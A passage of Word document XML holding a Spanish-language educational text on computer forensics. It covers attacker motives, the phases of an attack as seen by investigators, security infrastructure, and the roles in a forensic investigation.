          <w:p w14:paraId="7CB7637C" w14:textId="46A8061E" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="227075EC" w14:textId="1504C462" w:rsidR="005E7F53" w:rsidRPr="009440E4" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009440E4">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7F53" w14:paraId="2B6C4AB0" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625A309F" w14:textId="045C6469" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ideología</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39083BDF" w14:textId="36FF8CBC" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BEDBA5F" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A13989E" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CD2B187" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F1507F" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19AA0AC8" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7F53" w14:paraId="26B5C109" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBA4F48" w14:textId="3356E7EB" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dinero</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C805BCA" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434E3E08" w14:textId="04C6C7FD" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAE9718" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E7338E" w14:textId="58F2F785" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37B1C57F" w14:textId="7C0E9582" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F27D17" w14:textId="568AA784" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7F53" w14:paraId="3CE1F9E8" w14:textId="77777777" w:rsidTr="00D40650">
        <w:trPr>
          <w:trHeight w:val="443"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="747A05F8" w14:textId="36B549AC" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Venganza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0843F89A" w14:textId="20496692" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1149" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32A4E903" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8BF359" w14:textId="3AF0ACEE" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4303A6AD" w14:textId="77777777" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1192" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E1E12BC" w14:textId="3E2701A6" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1059" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C1B8F8" w14:textId="79771950" w:rsidR="005E7F53" w:rsidRPr="009940A1" w:rsidRDefault="005E7F53" w:rsidP="005E7F53">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009940A1">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A81B318" w14:textId="2CC04602" w:rsidR="00E67D92" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En la primera fase (reconocimiento), se busca reconocer y recolectar información. De esta manera, el atacante puede saber cómo puede actuar y los riesgos posibles, para así poder avanzar. En la segunda fase (ataque) se compromete el sistema, avanzando hasta el nivel más alto, teniendo el control del sistema atacado. Esta etapa usualmente se maneja de manera discreta, lo que dificulta la identificación del intruso. Usualmente, la vanidad del intruso y la falta de discreción ayudan al investigador a resolver el caso con mayor facilidad. Finalmente, (en la fase de eliminación) se altera, elimina o desaparece toda la evidencia que pueda comprometer al intruso en algún caso judicial. Del cuidado con el que el atacante proceda en esta fase depende el proceso del informático forense y del caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4AD5A5" w14:textId="229365F2" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00D54AC2" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Administradores y la infraestructura de la seguridad informática.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECC891" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El administrador del sistema es el experto encargado de la configuración de este, de la infraestructura informática y de la seguridad del sistema. Estos administradores son los primeros en estar en contacto con la inseguridad de la información, ya sea por un atacante o por una falla interna de los equipos. Al ser los arquitectos de la infraestructura y de la seguridad de la información del sistema, son quienes primero deberían reaccionar ante un ataque. Además, ellos deben proporcionar su conocimiento de la infraestructura del sistema para apoyar el caso y poder resolverlo con mayor facilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BBEB7" w14:textId="16F809B3" w:rsidR="00565C5B" w:rsidRPr="009440E4" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Las </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">infraestructuras de seguridad informática (realizadas por el administrador) han avanzado a medida que avanzan las tecnologías. Inicialmente, se utilizaba una infraestructura centralizada en la cual la información se encontraba en un equipo. Por lo tanto, en este caso la seguridad informática se concentraba en el control del acceso a los equipos con la información, al control del lugar en donde se encontraban y en el entrenamiento de quienes estaban encargados de manejar los equipos. Pero con la </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tecnología fueron cambiando las infraestructuras y las inseguridades cambiaron. Así es como se crearon los proxies</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Proxies: Plural de Proxy"</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 firewall</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Firewall: Dispositivo de seguridad de red que monitorea y controla el tráfico de red entrante y saliente basado en un conjunto de reglas de seguridad."</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 el sistema de detección de intrusos (IDS</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IDS: Intrusion Detection System, sistema que monitoriza redes o sistemas para detectar actividades maliciosas."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F4CA6" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el sistema de prevención de intrusos (IPS</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IPS: Intrusion Prevention System, sistema diseñado para detectar y prevenir ataques a la red."</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 entre muchas otras herramientas para proveer una mejor seguridad a los sistemas, ya que ahora el acceso no ocurría solo a través de la máquina, sino a través de otras y de la Web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FC2D7" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Por otro lado, es importante hablar de la auditabilidad y trazabilidad, que son propiedades del sistema, relacionados con la infraestructura que son útiles como evidencia para el investigador. La auditabilidad es la capacidad del sistema para registrar los eventos de una acción en particular con el fin de mantener la historia de estos y de realizar un control con mayor facilidad. En cambio, la trazabilidad es la propiedad que tiene un sistema para rastrear o reconstruir relaciones entre diferentes objetos monitorizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7249375B" w14:textId="4A96F3FB" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Es importante resaltar que el administrador debe conocer lo suficiente sobre la infraestructura del sistema para poder colaborar con el caso, ya que su análisis puede facilitar el proceso del investigador forense. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863D53A" w14:textId="01A86F4F" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00D54AC2" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Investigador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8996AA" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Es un nuevo profesional que actúa como experto, criminalista digital, o informático. Comprende y conoce las nuevas tecnologías de la información. Además, el investigador analiza la inseguridad informática emergente en los sistemas. El perfil del investigador es nuevo y necesario en el contexto abierto informático en el que vivimos. Por lo tanto, es necesario formar personas que puedan trabajar como investigadores en la disciplina emergente de la criminalística digital y el cómputo forense. Estas prácticas emergentes buscan articular las prácticas generales de la criminalística con las evidencias digitales disponibles en una escena del crimen. El trabajo del informático es indagar en las evidencias, analizarlas y evaluarlas para poder decidir cómo estas evidencias pueden ayudar a resolver el caso. Por lo tanto, es ideal que un investigador tenga conocimientos (al menos) sobre las siguientes áreas: justicia criminal, auditoría, administración y operación de tecnologías de Información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67192673" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="00565C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00565C5B">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>En una investigación informática forense, hay ocho roles principales en un caso: el líder del caso, el propietario del sistema, el asesor legal, el auditor/ingeniero especialista en seguridad de la información, el administrador del sistema, el especialista en informática forense, el analista en informática forense y el fiscal. Usualmente, entre todos estos roles, los informáticos forenses pueden tomar los siguientes cuatro roles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDFE058" w14:textId="5F97630D" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Líder del caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC7BFC0" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B" w:rsidP="005E7F53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Es aquel que planea y organiza todo el proceso de investigación digital. Debe identificar el lugar en donde se realizará la investigación, quienes serán los participantes y el tiempo necesario para esta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EA9E90" w14:textId="21662D28" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Auditor/ingeniero especialista en seguridad de la información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E1674" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B" w:rsidP="005E7F53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conoce el escenario en donde se desarrolla la investigación. Tiene el conocimiento del modelo de seguridad, los usuarios y las acciones que pueden realizar en el respectivo sistema. A partir de sus conocimientos debe entregar información crítica a la investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F78B1" w14:textId="7F8E19A4" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Especialista en informática forense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA5D7A9" w14:textId="77777777" w:rsidR="00565C5B" w:rsidRDefault="00565C5B" w:rsidP="005E7F53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Es un criminalista digital que debe identificar los diferentes elementos probatorios informáticos vinculados al caso, determinando la relación entre los elementos y los hechos para descubrir el autor del delito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0520AAB0" w14:textId="7A0D986D" w:rsidR="00565C5B" w:rsidRPr="00AB038E" w:rsidRDefault="00565C5B">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Analista en informática forense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E79670C" w14:textId="38B1B103" w:rsidR="000D10AB" w:rsidRDefault="00565C5B" w:rsidP="005E7F53">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Examina en detalle los datos, los elementos informáticos recogidos en la escena del crimen con el fin de extraer toda la información posible y relevante para resolver el caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C2178" w14:textId="6F484BAB" w:rsidR="000D10AB" w:rsidRDefault="00AB038E" w:rsidP="00AB038E">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB038E">
        <w:t>Retos y riesgos en el análisis forense.</w:t>
      </w:r>
    </w:p>
